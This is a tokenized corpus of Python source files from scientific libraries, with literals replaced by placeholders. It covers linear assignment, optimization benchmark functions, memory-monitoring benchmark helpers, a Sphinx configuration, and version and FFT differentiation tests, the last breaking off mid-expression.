<NUM_LIT:0> ] ] == <NUM_LIT:2> ) <EOL> if state . marked [ row , col ] != <NUM_LIT:2> : <EOL> col = - <NUM_LIT:1> <EOL> count += <NUM_LIT:1> <EOL> path [ count , <NUM_LIT:0> ] = path [ count - <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> path [ count , <NUM_LIT:1> ] = col <EOL> for i in range ( count + <NUM_LIT:1> ) : <EOL> if state . marked [ path [ i , <NUM_LIT:0> ] , path [ i , <NUM_LIT:1> ] ] == <NUM_LIT:1> : <EOL> state . marked [ path [ i , <NUM_LIT:0> ] , path [ i , <NUM_LIT:1> ] ] = <NUM_LIT:0> <EOL> else : <EOL> state . marked [ path [ i , <NUM_LIT:0> ] , path [ i , <NUM_LIT:1> ] ] = <NUM_LIT:1> <EOL> state . _clear_covers ( ) <EOL> state . marked [ state . marked == <NUM_LIT:2> ] = <NUM_LIT:0> <EOL> return _step3 <EOL> def _step6 ( state ) : <EOL> """<STR_LIT>""" <EOL> if np . any ( state . row_uncovered ) and np . any ( state . col_uncovered ) : <EOL> minval = np . min ( state . C [ state . row_uncovered ] , axis = <NUM_LIT:0> ) <EOL> minval = np . min ( minval [ state . col_uncovered ] ) <EOL> state . C [ np . logical_not ( state . row_uncovered ) ] += minval <EOL> state . C [ : , state . col_uncovered ] -= minval <EOL> return _step4 </s>
<s> import numpy as np <EOL> from sklearn . utils . optimize import newton_cg <EOL> from scipy . optimize import fmin_ncg <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> def test_newton_cg ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> A = rng . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> x0 = np . ones ( <NUM_LIT:10> ) <EOL> def func ( x ) : <EOL> Ax = A . dot ( x ) <EOL> return <NUM_LIT> * ( Ax ) . dot ( Ax ) <EOL> def grad ( x ) : <EOL> return A . T . dot ( A . dot ( x ) ) <EOL> def hess ( x , p ) : <EOL> return p . dot ( A . T . dot ( A . dot ( x . all ( ) ) ) ) <EOL> def grad_hess ( x ) : <EOL> return grad ( x ) , lambda x : A . T . dot ( A . dot ( x ) ) <EOL> assert_array_almost_equal ( <EOL> newton_cg ( grad_hess , func , grad , x0 , tol = <NUM_LIT> ) [ <NUM_LIT:0> ] , <EOL> fmin_ncg ( f = func , x0 = x0 , fprime = grad , fhess_p = hess ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import , print_function <EOL> import sys <EOL> import re <EOL> import time <EOL> import textwrap <EOL> import subprocess <EOL> class Benchmark ( object ) : <EOL> """<STR_LIT>""" <EOL> goal_time = <NUM_LIT> <EOL> def run_monitored ( code ) : <EOL> """<STR_LIT>""" <EOL> if not sys . platform . startswith ( '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> code = textwrap . dedent ( code ) <EOL> process = subprocess . Popen ( [ sys . executable , '<STR_LIT:-c>' , code ] ) <EOL> peak_memusage = - <NUM_LIT:1> <EOL> start = time . time ( ) <EOL> while True : <EOL> ret = process . poll ( ) <EOL> if ret is not None : <EOL> break <EOL> with open ( '<STR_LIT>' % process . pid , '<STR_LIT:r>' ) as f : <EOL> procdata = f . read ( ) <EOL> m = re . search ( '<STR_LIT>' , procdata , re . S | re . I ) <EOL> if m is not None : <EOL> memusage = float ( m . group ( <NUM_LIT:1> ) ) * <NUM_LIT> <EOL> peak_memusage = max ( memusage , peak_memusage ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> process . wait ( ) <EOL> duration = time . time ( ) - start <EOL> if process . returncode != <NUM_LIT:0> : <EOL> raise AssertionError ( "<STR_LIT>" % code ) <EOL> return duration , peak_memusage <EOL> def get_mem_info ( ) : <EOL> """<STR_LIT>""" <EOL> if not sys . platform . startswith ( '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> info = { } <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> p = line . split ( ) <EOL> info [ p [ <NUM_LIT:0> ] . strip ( '<STR_LIT::>' ) . lower ( ) ] = float ( p [ <NUM_LIT:1> ] ) * <NUM_LIT> <EOL> return info <EOL> def set_mem_rlimit ( max_mem = None ) : <EOL> """<STR_LIT>""" <EOL> import resource <EOL> if max_mem is None : <EOL> mem_info = get_mem_info ( ) <EOL> max_mem = int ( mem_info [ '<STR_LIT>' ] * <NUM_LIT> ) <EOL> cur_limit = resource . getrlimit ( resource . RLIMIT_AS ) <EOL> if cur_limit [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> max_mem = min ( max_mem , cur_limit [ <NUM_LIT:0> ] ) <EOL> resource . setrlimit ( resource . RLIMIT_AS , ( max_mem , cur_limit [ <NUM_LIT:1> ] ) ) <EOL> def with_attributes ( ** attrs ) : <EOL> def decorator ( func ) : <EOL> for key , value in attrs . items ( ) : <EOL> setattr ( func , key , value ) <EOL> return func <EOL> return decorator </s>
<s> from __future__ import division , print_function , absolute_import <EOL> from numpy import atleast_2d , arange , sum , cos , exp , pi <EOL> from . go_benchmark import Benchmark <EOL> class Watson ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:6> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - <NUM_LIT> ] * self . N , [ <NUM_LIT> ] * self . N ) <EOL> self . global_optimum = [ [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> ] ] <EOL> self . fglob = <NUM_LIT> <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> i = atleast_2d ( arange ( <NUM_LIT> ) ) . T <EOL> a = i / <NUM_LIT> <EOL> j = arange ( <NUM_LIT> ) <EOL> k = arange ( <NUM_LIT> ) <EOL> t1 = sum ( ( j + <NUM_LIT:1> ) * a ** j * x [ <NUM_LIT:1> : ] , axis = <NUM_LIT:1> ) <EOL> t2 = sum ( a ** k * x , axis = <NUM_LIT:1> ) <EOL> inner = ( t1 - t2 ** <NUM_LIT:2> - <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> return sum ( inner ) + x [ <NUM_LIT:0> ] ** <NUM_LIT:2> <EOL> class Wavy ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:2> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - pi ] * self . N , [ pi ] * self . N ) <EOL> self . global_optimum = [ [ <NUM_LIT:0.0> for _ in range ( self . N ) ] ] <EOL> self . fglob = <NUM_LIT:0.0> <EOL> self . change_dimensionality = True <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> return <NUM_LIT:1.0> - ( <NUM_LIT:1.0> / self . N ) * sum ( cos ( <NUM_LIT:10> * x ) * exp ( - x ** <NUM_LIT> / <NUM_LIT> ) ) <EOL> class WayburnSeader01 ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:2> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - <NUM_LIT> ] * self . N , [ <NUM_LIT> ] * self . N ) <EOL> self . custom_bounds = ( [ - <NUM_LIT:2> , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> self . global_optimum = [ [ <NUM_LIT:1.0> , <NUM_LIT> ] ] <EOL> self . fglob = <NUM_LIT:0.0> <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> return ( x [ <NUM_LIT:0> ] ** <NUM_LIT:6> + x [ <NUM_LIT:1> ] ** <NUM_LIT:4> - <NUM_LIT> ) ** <NUM_LIT:2> + ( <NUM_LIT:2> * x [ <NUM_LIT:0> ] + x [ <NUM_LIT:1> ] - <NUM_LIT:4> ) ** <NUM_LIT:2> <EOL> class WayburnSeader02 ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:2> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - <NUM_LIT> ] * self . N , <EOL> [ <NUM_LIT> ] * self . N ) <EOL> self . custom_bounds = ( [ - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . global_optimum = [ [ <NUM_LIT> , <NUM_LIT:1.0> ] ] <EOL> self . fglob = <NUM_LIT:0.0> <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> u = ( <NUM_LIT> - <NUM_LIT:4> * ( x [ <NUM_LIT:0> ] - <NUM_LIT> ) ** <NUM_LIT:2> - <NUM_LIT:4> * ( x [ <NUM_LIT:1> ] - <NUM_LIT> ) ** <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> v = ( x [ <NUM_LIT:1> ] - <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> return u + v <EOL> class Weierstrass ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:2> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - <NUM_LIT:0.5> ] * self . N , [ <NUM_LIT:0.5> ] * self . N ) <EOL> self . global_optimum = [ [ <NUM_LIT:0.0> for _ in range ( self . N ) ] ] <EOL> self . fglob = <NUM_LIT:0> <EOL> self . change_dimensionality = True <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> kmax = <NUM_LIT:20> <EOL> a , b = <NUM_LIT:0.5> , <NUM_LIT> <EOL> k = atleast_2d ( arange ( kmax + <NUM_LIT:1.> ) ) . T <EOL> t1 = a ** k * cos ( <NUM_LIT:2> * pi * b ** k * ( x + <NUM_LIT:0.5> ) ) <EOL> t2 = self . N * sum ( a ** k . T * cos ( pi * b ** k . T ) ) <EOL> return sum ( sum ( t1 , axis = <NUM_LIT:0> ) ) - t2 <EOL> class Whitley ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:2> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ - <NUM_LIT> ] * self . N , <EOL> [ <NUM_LIT> ] * self . N ) <EOL> self . custom_bounds = ( [ - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . global_optimum = [ [ <NUM_LIT:1.0> for _ in range ( self . N ) ] ] <EOL> self . fglob = <NUM_LIT:0.0> <EOL> self . change_dimensionality = True <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> XI = x <EOL> XJ = atleast_2d ( x ) . T <EOL> temp = <NUM_LIT> * ( ( XI ** <NUM_LIT> ) - XJ ) + ( <NUM_LIT:1.0> - XJ ) ** <NUM_LIT> <EOL> inner = ( temp ** <NUM_LIT> / <NUM_LIT> ) - cos ( temp ) + <NUM_LIT:1.0> <EOL> return sum ( sum ( inner , axis = <NUM_LIT:0> ) ) <EOL> class Wolfe ( Benchmark ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , dimensions = <NUM_LIT:3> ) : <EOL> Benchmark . __init__ ( self , dimensions ) <EOL> self . _bounds = zip ( [ <NUM_LIT:0.0> ] * self . N , [ <NUM_LIT> ] * self . N ) <EOL> self . global_optimum = [ [ <NUM_LIT:0.0> for _ in range ( self . N ) ] ] <EOL> self . fglob = <NUM_LIT:0.0> <EOL> def fun ( self , x , * args ) : <EOL> self . nfev += <NUM_LIT:1> <EOL> return <NUM_LIT:4> / <NUM_LIT:3> * ( x [ <NUM_LIT:0> ] ** <NUM_LIT:2> + x [ <NUM_LIT:1> ] ** <NUM_LIT:2> - x [ <NUM_LIT:0> ] * x [ <NUM_LIT:1> ] ) ** <NUM_LIT> + x [ <NUM_LIT:2> ] </s>
<s> import sys , os , re <EOL> import sphinx <EOL> if sphinx . __version__ < "<STR_LIT>" : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> needs_sphinx = '<STR_LIT>' <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( os . path . dirname ( __file__ ) ) ) <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from matplotlib . sphinxext import plot_directive <EOL> except ImportError : <EOL> use_matplotlib_plot_directive = False <EOL> else : <EOL> try : <EOL> use_matplotlib_plot_directive = ( plot_directive . __version__ >= <NUM_LIT:2> ) <EOL> except AttributeError : <EOL> use_matplotlib_plot_directive = False <EOL> if use_matplotlib_plot_directive : <EOL> extensions . append ( '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> import scipy <EOL> version = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , scipy . __version__ ) <EOL> release = scipy . __version__ <EOL> print "<STR_LIT>" % ( version , ) <EOL> today_fmt = '<STR_LIT>' <EOL> default_role = "<STR_LIT>" <EOL> exclude_dirs = [ ] <EOL> add_function_parentheses = False <EOL> show_authors = False <EOL> pygments_style = '<STR_LIT>' <EOL> themedir = os . path . join ( os . pardir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . isdir ( themedir ) : <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ themedir ] <EOL> if '<STR_LIT>' in tags : <EOL> html_theme_options = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT:right>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> } <EOL> else : <EOL> html_theme_options = { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT:left>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> html_logo = '<STR_LIT>' <EOL> html_sidebars = { '<STR_LIT:index>' : '<STR_LIT>' } <EOL> else : <EOL> if '<STR_LIT>' in tags : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> html_style = '<STR_LIT>' <EOL> html_logo = '<STR_LIT>' <EOL> html_sidebars = { '<STR_LIT:index>' : '<STR_LIT>' } <EOL> html_title = "<STR_LIT>" % ( project , version ) <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> html_additional_pages = { } <EOL> html_use_modindex = True <EOL> html_copy_source = False <EOL> html_file_suffix = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> mathjax_path = "<STR_LIT>" <EOL> _stdauthor = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , _stdauthor , '<STR_LIT>' ) , <EOL> ] <EOL> latex_preamble = r'''<STR_LIT>''' <EOL> latex_use_modindex = False <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> phantom_import_file = '<STR_LIT>' <EOL> numpydoc_use_plots = True <EOL> if sphinx . __version__ >= "<STR_LIT>" : <EOL> import glob <EOL> autosummary_generate = glob . glob ( "<STR_LIT>" ) <EOL> coverage_ignore_modules = r"""<STR_LIT:U+0020>""" . split ( ) <EOL> coverage_ignore_functions = r"""<STR_LIT>""" . split ( ) <EOL> coverage_ignore_classes = r"""<STR_LIT:U+0020>""" . split ( ) <EOL> coverage_c_path = [ ] <EOL> coverage_c_regexes = { } <EOL> coverage_ignore_c_items = { } <EOL> plot_pre_code = """<STR_LIT>""" <EOL> plot_include_source = True <EOL> plot_formats = [ ( '<STR_LIT>' , <NUM_LIT> ) , '<STR_LIT>' ] <EOL> plot_html_show_formats = False <EOL> import math <EOL> phi = ( math . sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> font_size = <NUM_LIT> * <NUM_LIT> / <NUM_LIT> <EOL> plot_rcparams = { <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : ( <NUM_LIT:3> * phi , <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> if not use_matplotlib_plot_directive : <EOL> import matplotlib <EOL> matplotlib . rcParams . update ( plot_rcparams ) <EOL> import inspect <EOL> from os . path import relpath , dirname <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> try : <EOL> __import__ ( name ) <EOL> extensions . append ( name ) <EOL> break <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" <EOL> def linkcode_resolve ( domain , info ) : <EOL> """<STR_LIT>""" <EOL> if domain != '<STR_LIT>' : <EOL> return None <EOL> modname = info [ '<STR_LIT>' ] <EOL> fullname = info [ '<STR_LIT>' ] <EOL> submod = sys . modules . get ( modname ) <EOL> if submod is None : <EOL> return None <EOL> obj = submod <EOL> for part in fullname . split ( '<STR_LIT:.>' ) : <EOL> try : <EOL> obj = getattr ( obj , part ) <EOL> except : <EOL> return None <EOL> try : <EOL> fn = inspect . getsourcefile ( obj ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> try : <EOL> fn = inspect . getsourcefile ( sys . modules [ obj . __module__ ] ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> return None <EOL> try : <EOL> source , lineno = inspect . getsourcelines ( obj ) <EOL> except : <EOL> lineno = None <EOL> if lineno : <EOL> linespec = "<STR_LIT>" % ( lineno , lineno + len ( source ) - <NUM_LIT:1> ) <EOL> else : <EOL> linespec = "<STR_LIT>" <EOL> fn = relpath ( fn , start = dirname ( scipy . __file__ ) ) <EOL> if '<STR_LIT>' in scipy . __version__ : <EOL> return "<STR_LIT>" % ( <EOL> fn , linespec ) <EOL> else : <EOL> return "<STR_LIT>" % ( <EOL> scipy . __version__ , fn , linespec ) </s>
<s> from numpy . testing import assert_ , run_module_suite , assert_raises <EOL> from scipy . _lib . _version import NumpyVersion <EOL> def test_main_versions ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > ver ) <EOL> def test_version_1_point_10 ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> def test_alpha_beta_rc ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > '<STR_LIT>' ) <EOL> def test_dev_version ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> def test_dev_a_b_rc_mixed ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> def test_dev0_version ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> def test_dev0_a_b_rc_mixed ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> def test_raises ( ) : <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_raises ( ValueError , NumpyVersion , ver ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> __usage__ = """<STR_LIT>""" <EOL> from numpy . testing import ( TestCase , assert_equal , assert_almost_equal , <EOL> assert_array_almost_equal , run_module_suite ) <EOL> from scipy . fftpack import ( diff , fft , ifft , tilbert , itilbert , hilbert , <EOL> ihilbert , shift , fftfreq , cs_diff , sc_diff , <EOL> ss_diff , cc_diff ) <EOL> import numpy as np <EOL> from numpy import arange , sin , cos , pi , exp , tanh , sum , sign <EOL> from numpy . random import random <EOL> def direct_diff ( x , k = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * <NUM_LIT> * pi / period * n <EOL> if k < <NUM_LIT:0> : <EOL> w = <NUM_LIT:1> / w ** k <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT:0.0> <EOL> else : <EOL> w = w ** k <EOL> if n > <NUM_LIT> : <EOL> w [ <NUM_LIT> : n - <NUM_LIT> ] = <NUM_LIT:0.0> <EOL> return ifft ( w * fx ) . real <EOL> def direct_tilbert ( x , h = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * h * <NUM_LIT:2> * pi / period * n <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> w = <NUM_LIT> / tanh ( w ) <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> return ifft ( w * fx ) <EOL> def direct_itilbert ( x , h = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * h * <NUM_LIT:2> * pi / period * n <EOL> w = - <NUM_LIT> * tanh ( w ) <EOL> return ifft ( w * fx ) <EOL> def direct_hilbert ( x ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> w = fftfreq ( n ) * n <EOL> w = <NUM_LIT> * sign ( w ) <EOL> return ifft ( w * fx ) <EOL> def direct_ihilbert ( x ) : <EOL> return - direct_hilbert ( x ) <EOL> def direct_shift ( x , a , period = None ) : <EOL> n = len ( x ) <EOL> if period is None : <EOL> k = fftfreq ( n ) * <NUM_LIT> * n <EOL> else : <EOL> k = fftfreq ( n ) * <NUM_LIT> * pi / period * n <EOL> return ifft ( fft ( x ) * exp ( k * a ) ) . real <EOL> class TestDiff ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:32> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) ) , direct_diff ( sin ( x ) ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:2> ) , direct_diff ( sin ( x ) , <NUM_LIT:2> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:3> ) , direct_diff ( sin ( x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:4> ) , direct_diff ( sin ( x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:5> ) , direct_diff ( sin ( x ) , <NUM_LIT:5> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:3> ) , direct_diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:4> ) , direct_diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) ) , direct_diff ( cos ( x ) ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:2> ) , direct_diff ( cos ( x ) , <NUM_LIT:2> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:3> ) , direct_diff ( cos ( x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:4> ) , direct_diff ( cos ( x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( <NUM_LIT:2> * x ) ) , direct_diff ( cos ( <NUM_LIT:2> * x ) ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x * n / <NUM_LIT:8> ) ) , direct_diff ( sin ( x * n / <NUM_LIT:8> ) ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x * n / <NUM_LIT:8> ) ) , direct_diff ( cos ( x * n / <NUM_LIT:8> ) ) ) <EOL> for k in range ( <NUM_LIT:5> ) : <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:4> * x ) , k ) , direct_diff ( sin ( <NUM_LIT:4> * x ) , k ) ) <EOL> assert_array_almost_equal ( diff ( cos ( <NUM_LIT:4> * x ) , k ) , direct_diff ( cos ( <NUM_LIT:4> * x ) , k ) ) <EOL> def test_period ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT:64> ] : <EOL> x = arange ( n ) / float ( n ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * pi * x ) , period = <NUM_LIT:1> ) , <EOL> <NUM_LIT:2> * pi * cos ( <NUM_LIT:2> * pi * x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * pi * x ) , <NUM_LIT:3> , period = <NUM_LIT:1> ) , <EOL> - ( <NUM_LIT:2> * pi ) ** <NUM_LIT:3> * cos ( <NUM_LIT:2> * pi * x ) ) <EOL> def test_sin ( self ) : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) ) , cos ( x ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:2> ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:4> ) , sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:4> * x ) ) , <NUM_LIT:4> * cos ( <NUM_LIT:4> * x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( sin ( x ) ) ) , cos ( x ) * cos ( sin ( x ) ) ) <EOL> def test_expr ( self ) : <EOL> for n in [ <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:100> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] [ : <NUM_LIT:5> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) * cos ( <NUM_LIT:4> * x ) + exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> df = cos ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:4> * sin ( x ) * sin ( <NUM_LIT:4> * x ) + <NUM_LIT:3> * cos ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> ddf = - <NUM_LIT> * sin ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:8> * cos ( x ) * sin ( <NUM_LIT:4> * x ) - <NUM_LIT:9> * sin ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) + 